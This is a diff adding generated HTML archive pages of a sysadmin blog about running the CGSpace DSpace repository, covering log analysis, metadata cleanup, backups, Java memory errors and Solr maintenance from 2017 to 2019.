+<li>But after this I tried to delete the item from the XMLUI and it is <em>still</em> present&hellip;</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2019-05/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2019-04/">April, 2019</a></h2>
+    <p class="blog-post-meta"><time datetime="2019-04-01T09:00:43+03:00">Mon Apr 01, 2019</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2019-04-01">2019-04-01</h2>
+<ul>
+<li>Meeting with AgroKnow to discuss CGSpace, ILRI data, AReS, GARDIAN, etc
+<ul>
+<li>They asked if we had plans to enable RDF support in CGSpace</li>
+</ul>
+</li>
+<li>There have been 4,400 more downloads of the CTA Spore publication from those strange Amazon IP addresses today
+<ul>
+<li>I suspected that some might not be successful, because the stats show less, but today they were all HTTP 200!</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep &#39;Spore-192-EN-web.pdf&#39; | grep -E &#39;(18.196.196.108|18.195.78.144|18.195.218.6)&#39; | awk &#39;{print $9}&#39; | sort | uniq -c | sort -n | tail -n 5
+   4432 200
+</code></pre><ul>
+<li>In the last two weeks there have been 47,000 downloads of this <em>same exact PDF</em> by these three IP addresses</li>
+<li>Apply country and region corrections and deletions on DSpace Test and CGSpace:</li>
+</ul>
+<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-9-countries.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.coverage.country -m 228 -t ACTION -d
+$ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-4-regions.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.coverage.region -m 231 -t action -d
+$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-2-countries.csv -db dspace -u dspace -p &#39;fuuu&#39; -m 228 -f cg.coverage.country -d
+$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace -u dspace -p &#39;fuuu&#39; -m 231 -f cg.coverage.region -d
+</code></pre>
+  <a href='https://alanorth.github.io/cgspace-notes/2019-04/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2019-03/">March, 2019</a></h2>
+    <p class="blog-post-meta"><time datetime="2019-03-01T12:16:30+01:00">Fri Mar 01, 2019</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2019-03-01">2019-03-01</h2>
+<ul>
+<li>I checked IITA&rsquo;s 259 Feb 14 records from last month for duplicates using Atmire&rsquo;s Duplicate Checker on a fresh snapshot of CGSpace on my local machine and everything looks good</li>
+<li>I am now only waiting to hear from her about where the items should go, though I assume Journal Articles go to IITA Journal Articles collection, etc&hellip;</li>
+<li>Looking at the other half of Udana&rsquo;s WLE records from 2018-11
+<ul>
+<li>I finished the ones for Restoring Degraded Landscapes (RDL), but these are for Variability, Risks and Competing Uses (VRC)</li>
+<li>I did the usual cleanups for whitespace, added regions where they made sense for certain countries, cleaned up the DOI link formats, added rights information based on the publications page for a few items</li>
+<li>Most worryingly, there are encoding errors in the abstracts for eleven items, for example:</li>
+<li>68.15% � 9.45 instead of 68.15% ± 9.45</li>
+<li>2003�2013 instead of 2003–2013</li>
+</ul>
+</li>
+<li>I think I will need to ask Udana to re-copy and paste the abstracts with more care using Google Docs</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2019-03/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2019-02/">February, 2019</a></h2>
+    <p class="blog-post-meta"><time datetime="2019-02-01T21:37:30+02:00">Fri Feb 01, 2019</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2019-02-01">2019-02-01</h2>
+<ul>
+<li>Linode has alerted a few times since last night that the CPU usage on CGSpace (linode18) was high despite me increasing the alert threshold last week from 250% to 275%—I might need to increase it again!</li>
+<li>The top IPs before, during, and after this latest alert tonight were:</li>
+</ul>
+<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;01/Feb/2019:(17|18|19|20|21)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
+    245 207.46.13.5
+    332 54.70.40.11
+    385 5.143.231.38
+    405 207.46.13.173
+    405 207.46.13.75
+   1117 66.249.66.219
+   1121 35.237.175.180
+   1546 5.9.6.51
+   2474 45.5.186.2
+   5490 85.25.237.71
+</code></pre><ul>
+<li><code>85.25.237.71</code> is the &ldquo;Linguee Bot&rdquo; that I first saw last month</li>
+<li>The Solr statistics the past few months have been very high and I was wondering if the web server logs also showed an increase</li>
+<li>There were just over 3 million accesses in the nginx logs last month:</li>
+</ul>
+<pre tabindex="0"><code># time zcat --force /var/log/nginx/* | grep -cE &#34;[0-9]{1,2}/Jan/2019&#34;
+3018243
+
+real    0m19.873s
+user    0m22.203s
+sys     0m1.979s
+</code></pre>
+  <a href='https://alanorth.github.io/cgspace-notes/2019-02/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2019-01/">January, 2019</a></h2>
+    <p class="blog-post-meta"><time datetime="2019-01-02T09:48:30+02:00">Wed Jan 02, 2019</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2019-01-02">2019-01-02</h2>
+<ul>
+<li>Linode alerted that CGSpace (linode18) had a higher outbound traffic rate than normal early this morning</li>
+<li>I don&rsquo;t see anything interesting in the web server logs around that time though:</li>
+</ul>
+<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;02/Jan/2019:0(1|2|3)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
+     92 40.77.167.4
+     99 210.7.29.100
+    120 38.126.157.45
+    177 35.237.175.180
+    177 40.77.167.32
+    216 66.249.75.219
+    225 18.203.76.93
+    261 46.101.86.248
+    357 207.46.13.1
+    903 54.70.40.11
+</code></pre>
+  <a href='https://alanorth.github.io/cgspace-notes/2019-01/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2018-12/">December, 2018</a></h2>
+    <p class="blog-post-meta"><time datetime="2018-12-02T02:09:30+02:00">Sun Dec 02, 2018</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2018-12-01">2018-12-01</h2>
+<ul>
+<li>Switch CGSpace (linode18) to use OpenJDK instead of Oracle JDK</li>
+<li>I manually installed OpenJDK, then removed Oracle JDK, then re-ran the <a href="http://github.com/ilri/rmg-ansible-public">Ansible playbook</a> to update all configuration files, etc</li>
+<li>Then I ran all system updates and restarted the server</li>
+</ul>
+<h2 id="2018-12-02">2018-12-02</h2>
+<ul>
+<li>I noticed that there is another issue with PDF thumbnails on CGSpace, and I see there was another <a href="https://usn.ubuntu.com/3831-1/">Ghostscript vulnerability last week</a></li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2018-12/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2018-11/">November, 2018</a></h2>
+    <p class="blog-post-meta"><time datetime="2018-11-01T16:41:30+02:00">Thu Nov 01, 2018</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2018-11-01">2018-11-01</h2>
+<ul>
+<li>Finalize AReS Phase I and Phase II ToRs</li>
+<li>Send a note about my <a href="https://github.com/ilri/dspace-statistics-api">dspace-statistics-api</a> to the dspace-tech mailing list</li>
+</ul>
+<h2 id="2018-11-03">2018-11-03</h2>
+<ul>
+<li>Linode has been sending mails a few times a day recently that CGSpace (linode18) has had high CPU usage</li>
+<li>Today these are the top 10 IPs:</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2018-11/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2018-10/">October, 2018</a></h2>
+    <p class="blog-post-meta"><time datetime="2018-10-01T22:31:54+03:00">Mon Oct 01, 2018</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2018-10-01">2018-10-01</h2>
+<ul>
+<li>Phil Thornton got an ORCID identifier so we need to add it to the list on CGSpace and tag his existing items</li>
+<li>I created a GitHub issue to track this <a href="https://github.com/ilri/DSpace/issues/389">#389</a>, because I&rsquo;m super busy in Nairobi right now</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2018-10/'>Read more →</a>
+</article> 
+
+
+
+
+
+<nav class="blog-pagination">
+  
+  <a class="btn btn-outline-primary" href="/cgspace-notes/categories/notes/page/5/" rel="prev" role="button">Previous page</a>
+  <a class="btn btn-outline-primary" href="/cgspace-notes/categories/notes/page/7/" rel="next" role="button">Next page</a>
+  
+  
+  
+</nav>
+
+
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/categories/notes/page/7/index.html b/docs/categories/notes/page/7/index.html
new file mode 100644
index 000000000..2d175907c
--- /dev/null
+++ b/docs/categories/notes/page/7/index.html
@@ -0,0 +1,482 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="Notes" />
+<meta property="og:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository." />
+<meta property="og:type" content="website" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/categories/notes/" />
+<meta property="og:updated_time" content="2023-07-01T17:17:31+03:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="Notes"/>
+<meta name="twitter:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+      
+    
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/categories/notes/">
+
+    <title>CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    <link rel="alternate" type="application/rss+xml" href="https://alanorth.github.io/cgspace-notes/categories/notes/index.xml" title="CGSpace Notes" />
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link " href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2018-09/">September, 2018</a></h2>
+    <p class="blog-post-meta"><time datetime="2018-09-02T09:55:54+03:00">Sun Sep 02, 2018</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2018-09-02">2018-09-02</h2>
+<ul>
+<li>New <a href="https://jdbc.postgresql.org/documentation/changelog.html#version_42.2.5">PostgreSQL JDBC driver version 42.2.5</a></li>
+<li>I&rsquo;ll update the DSpace role in our <a href="https://github.com/ilri/rmg-ansible-public">Ansible infrastructure playbooks</a> and run the updated playbooks on CGSpace and DSpace Test</li>
+<li>Also, I&rsquo;ll re-run the <code>postgresql</code> tasks because the custom PostgreSQL variables are dynamic according to the system&rsquo;s RAM, and we never re-ran them after migrating to larger Linodes last month</li>
+<li>I&rsquo;m testing the new DSpace 5.8 branch in my Ubuntu 18.04 environment and I&rsquo;m getting those autowire errors in Tomcat 8.5.30 again:</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2018-09/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2018-08/">August, 2018</a></h2>
+    <p class="blog-post-meta"><time datetime="2018-08-01T11:52:54+03:00">Wed Aug 01, 2018</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2018-08-01">2018-08-01</h2>
+<ul>
+<li>DSpace Test had crashed at some point yesterday morning and I see the following in <code>dmesg</code>:</li>
+</ul>
+<pre tabindex="0"><code>[Tue Jul 31 00:00:41 2018] Out of memory: Kill process 1394 (java) score 668 or sacrifice child
+[Tue Jul 31 00:00:41 2018] Killed process 1394 (java) total-vm:15601860kB, anon-rss:5355528kB, file-rss:0kB, shmem-rss:0kB
+[Tue Jul 31 00:00:41 2018] oom_reaper: reaped process 1394 (java), now anon-rss:0kB, file-rss:0kB, shmem-rss:0kB
+</code></pre><ul>
+<li>Judging from the time of the crash it was probably related to the Discovery indexing that starts at midnight</li>
+<li>From the DSpace log I see that eventually Solr stopped responding, so I guess the <code>java</code> process that was OOM killed above was Tomcat&rsquo;s</li>
+<li>I&rsquo;m not sure why Tomcat didn&rsquo;t crash with an OutOfMemoryError&hellip;</li>
+<li>Anyways, perhaps I should increase the JVM heap from 5120m to 6144m like we did a few months ago when we tried to run the whole CGSpace Solr core</li>
+<li>The server only has 8GB of RAM so we&rsquo;ll eventually need to upgrade to a larger one because we&rsquo;ll start starving the OS, PostgreSQL, and command line batch processes</li>
+<li>I ran all system updates on DSpace Test and rebooted it</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2018-08/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2018-07/">July, 2018</a></h2>
+    <p class="blog-post-meta"><time datetime="2018-07-01T12:56:54+03:00">Sun Jul 01, 2018</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2018-07-01">2018-07-01</h2>
+<ul>
+<li>I want to upgrade DSpace Test to DSpace 5.8 so I took a backup of its current database just in case:</li>
+</ul>
+<pre tabindex="0"><code>$ pg_dump -b -v -o --format=custom -U dspace -f dspace-2018-07-01.backup dspace
+</code></pre><ul>
+<li>During the <code>mvn package</code> stage on the 5.8 branch I kept getting issues with java running out of memory:</li>
+</ul>
+<pre tabindex="0"><code>There is insufficient memory for the Java Runtime Environment to continue.
+</code></pre>
+  <a href='https://alanorth.github.io/cgspace-notes/2018-07/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2018-06/">June, 2018</a></h2>
+    <p class="blog-post-meta"><time datetime="2018-06-04T19:49:54-07:00">Mon Jun 04, 2018</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2018-06-04">2018-06-04</h2>
+<ul>
+<li>Test the <a href="https://tracker.atmire.com/tickets-cgiar-ilri/view-ticket?id=560">DSpace 5.8 module upgrades from Atmire</a> (<a href="https://github.com/ilri/DSpace/pull/378">#378</a>)
+<ul>
+<li>There seems to be a problem with the CUA and L&amp;R versions in <code>pom.xml</code> because they are using SNAPSHOT and it doesn&rsquo;t build</li>
+</ul>
+</li>
+<li>I added the new CCAFS Phase II Project Tag <code>PII-FP1_PACCA2</code> and merged it into the <code>5_x-prod</code> branch (<a href="https://github.com/ilri/DSpace/pull/379">#379</a>)</li>
+<li>I proofed and tested the ILRI author corrections that Peter sent back to me this week:</li>
+</ul>
+<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2018-05-30-Correct-660-authors.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.contributor.author -t correct -m 3 -n
+</code></pre><ul>
+<li>I think a sane proofing workflow in OpenRefine is to apply the custom text facets for check/delete/remove and illegal characters that I developed in <a href="/cgspace-notes/2018-03/">March, 2018</a></li>
+<li>Time to index ~70,000 items on CGSpace:</li>
+</ul>
+<pre tabindex="0"><code>$ time schedtool -D -e ionice -c2 -n7 nice -n19 [dspace]/bin/dspace index-discovery -b                                  
+
+real    74m42.646s
+user    8m5.056s
+sys     2m7.289s
+</code></pre>
+  <a href='https://alanorth.github.io/cgspace-notes/2018-06/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2018-05/">May, 2018</a></h2>
+    <p class="blog-post-meta"><time datetime="2018-05-01T16:43:54+03:00">Tue May 01, 2018</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2018-05-01">2018-05-01</h2>
+<ul>
+<li>I cleared the Solr statistics core on DSpace Test by issuing two commands directly to the Solr admin interface:
+<ul>
+<li>http://localhost:3000/solr/statistics/update?stream.body=%3Cdelete%3E%3Cquery%3E*:*%3C/query%3E%3C/delete%3E</li>
+<li>http://localhost:3000/solr/statistics/update?stream.body=%3Ccommit/%3E</li>
+</ul>
+</li>
+<li>Then I reduced the JVM heap size from 6144 back to 5120m</li>
+<li>Also, I switched it to use OpenJDK instead of Oracle Java, as well as re-worked the <a href="https://github.com/ilri/rmg-ansible-public">Ansible infrastructure scripts</a> to support hosts choosing which distribution they want to use</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2018-05/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2018-04/">April, 2018</a></h2>
+    <p class="blog-post-meta"><time datetime="2018-04-01T16:13:54+02:00">Sun Apr 01, 2018</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2018-04-01">2018-04-01</h2>
+<ul>
+<li>I tried to test something on DSpace Test but noticed that it&rsquo;s down since god knows when</li>
+<li>Catalina logs at least show some memory errors yesterday:</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2018-04/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2018-03/">March, 2018</a></h2>
+    <p class="blog-post-meta"><time datetime="2018-03-02T16:07:54+02:00">Fri Mar 02, 2018</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2018-03-02">2018-03-02</h2>
+<ul>
+<li>Export a CSV of the IITA community metadata for Martin Mueller</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2018-03/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2018-02/">February, 2018</a></h2>
+    <p class="blog-post-meta"><time datetime="2018-02-01T16:28:54+02:00">Thu Feb 01, 2018</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2018-02-01">2018-02-01</h2>
+<ul>
+<li>Peter gave feedback on the <code>dc.rights</code> proof of concept that I had sent him last week</li>
+<li>We don&rsquo;t need to distinguish between internal and external works, so that makes it just a simple list</li>
+<li>Yesterday I figured out how to monitor DSpace sessions using JMX</li>
+<li>I copied the logic in the <code>jmx_tomcat_dbpools</code> provided by Ubuntu&rsquo;s <code>munin-plugins-java</code> package and used the stuff I discovered about JMX <a href="/cgspace-notes/2018-01/">in 2018-01</a></li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2018-02/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2018-01/">January, 2018</a></h2>
+    <p class="blog-post-meta"><time datetime="2018-01-02T08:35:54-08:00">Tue Jan 02, 2018</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2018-01-02">2018-01-02</h2>
+<ul>
+<li>Uptime Robot noticed that CGSpace went down and up a few times last night, for a few minutes each time</li>
+<li>I didn&rsquo;t get any load alerts from Linode and the REST and XMLUI logs don&rsquo;t show anything out of the ordinary</li>
+<li>The nginx logs show HTTP 200s until <code>02/Jan/2018:11:27:17 +0000</code> when Uptime Robot got an HTTP 500</li>
+<li>In dspace.log around that time I see many errors like &ldquo;Client closed the connection before file download was complete&rdquo;</li>
+<li>And just before that I see this:</li>
+</ul>
+<pre tabindex="0"><code>Caused by: org.apache.tomcat.jdbc.pool.PoolExhaustedException: [http-bio-127.0.0.1-8443-exec-980] Timeout: Pool empty. Unable to fetch a connection in 5 seconds, none available[size:50; busy:50; idle:0; lastwait:5000].
+</code></pre><ul>
+<li>Ah hah! So the pool was actually empty!</li>
+<li>I need to increase that, let&rsquo;s try to bump it up from 50 to 75</li>
+<li>After that one client got an HTTP 499 but then the rest were HTTP 200, so I don&rsquo;t know what the hell Uptime Robot saw</li>
+<li>I notice this error quite a few times in dspace.log:</li>
+</ul>
+<pre tabindex="0"><code>2018-01-02 01:21:19,137 ERROR org.dspace.app.xmlui.aspect.discovery.SidebarFacetsTransformer @ Error while searching for sidebar facets
+org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse &#39;dateIssued_keyword:[1976+TO+1979]&#39;: Encountered &#34; &#34;]&#34; &#34;] &#34;&#34; at line 1, column 32.
+</code></pre><ul>
+<li>And there are many of these errors every day for the past month:</li>
+</ul>
+<pre tabindex="0"><code>$ grep -c &#34;Error while searching for sidebar facets&#34; dspace.log.*
+dspace.log.2017-11-21:4
+dspace.log.2017-11-22:1
+dspace.log.2017-11-23:4
+dspace.log.2017-11-24:11
+dspace.log.2017-11-25:0
+dspace.log.2017-11-26:1
+dspace.log.2017-11-27:7
+dspace.log.2017-11-28:21
+dspace.log.2017-11-29:31
+dspace.log.2017-11-30:15
+dspace.log.2017-12-01:15
+dspace.log.2017-12-02:20
+dspace.log.2017-12-03:38
+dspace.log.2017-12-04:65
+dspace.log.2017-12-05:43
+dspace.log.2017-12-06:72
+dspace.log.2017-12-07:27
+dspace.log.2017-12-08:15
+dspace.log.2017-12-09:29
+dspace.log.2017-12-10:35
+dspace.log.2017-12-11:20
+dspace.log.2017-12-12:44
+dspace.log.2017-12-13:36
+dspace.log.2017-12-14:59
+dspace.log.2017-12-15:104
+dspace.log.2017-12-16:53
+dspace.log.2017-12-17:66
+dspace.log.2017-12-18:83
+dspace.log.2017-12-19:101
+dspace.log.2017-12-20:74
+dspace.log.2017-12-21:55
+dspace.log.2017-12-22:66
+dspace.log.2017-12-23:50
+dspace.log.2017-12-24:85
+dspace.log.2017-12-25:62
+dspace.log.2017-12-26:49
+dspace.log.2017-12-27:30
+dspace.log.2017-12-28:54
+dspace.log.2017-12-29:68
+dspace.log.2017-12-30:89
+dspace.log.2017-12-31:53
+dspace.log.2018-01-01:45
+dspace.log.2018-01-02:34
+</code></pre><ul>
+<li>Danny wrote to ask for help renewing the wildcard ilri.org certificate and I advised that we should probably use Let&rsquo;s Encrypt if it&rsquo;s just a handful of domains</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2018-01/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2017-12/">December, 2017</a></h2>
+    <p class="blog-post-meta"><time datetime="2017-12-01T13:53:54+03:00">Fri Dec 01, 2017</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2017-12-01">2017-12-01</h2>
+<ul>
+<li>Uptime Robot noticed that CGSpace went down</li>
+<li>The logs say &ldquo;Timeout waiting for idle object&rdquo;</li>
+<li>PostgreSQL activity says there are 115 connections currently</li>
+<li>The list of connections to XMLUI and REST API for today:</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2017-12/'>Read more →</a>
+</article> 
+
+
+
+
+
+<nav class="blog-pagination">
+  
+  <a class="btn btn-outline-primary" href="/cgspace-notes/categories/notes/page/6/" rel="prev" role="button">Previous page</a>
+  <a class="btn btn-outline-primary" href="/cgspace-notes/categories/notes/page/8/" rel="next" role="button">Next page</a>
+  
+  
+  
+</nav>
+
+
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
